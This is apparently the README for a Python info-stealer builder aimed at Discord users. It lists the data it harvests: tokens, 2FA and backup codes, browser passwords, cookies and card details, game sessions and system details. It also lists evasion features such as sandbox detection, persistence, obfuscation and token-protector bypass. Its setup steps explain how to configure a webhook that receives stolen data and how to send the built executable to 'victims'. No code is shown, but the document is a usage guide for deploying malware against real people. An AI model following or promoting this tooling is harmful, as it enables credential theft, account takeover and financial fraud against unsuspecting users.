Discord Info
- Token
- Nitro
- Billing
- 2FA
- Phone
- Gift Codes
- Backup Codes
Browser Data
- Cookies
- Passwords
- History
- Credit/Debit Cards
Game Data
- Minecraft Session Info
- Roblox Cookie & Other Data
Discord Injection
- Sends token, password & email on user login or when user changes password
System info
- User
- OS
- System
- Network IP
- Wifi
- Mac
- Hwid
- PC Specs
- Screenshot
General Functions
- Checks if being run in a virustotal sandbox/virtual machine
- Checks for blacklisted users, pc names, HWIDs, IPs, MACs and Processes
- Adds file to startup
- Anti Spam
- Fake Error
- Obfuscation
- Icon
- Low Detections
- Bypass Token Protector
- File Pumper
- Self Destruct
Make sure you have Python installed 3.11+ and it is added to your path
Once you've downloaded the files extract the folder so it's no longer a .zip file.
You dont need to install any modules opening setup.bat will install them for you. Then you need to open run.bat as administrator which will
open the gui.
This webhook will be sent any victims you log so don't delete it once it's made. Once you've created one paste it
into the box which asks for your webhook.
Now once you've done that you can tick on the options that you want enabled and anything you don't understand you can go
to the documentation where each option is explained.
The .exe file will appear in the same folder where all the other files are with the name you set it as and you can now send
this to your victims.๐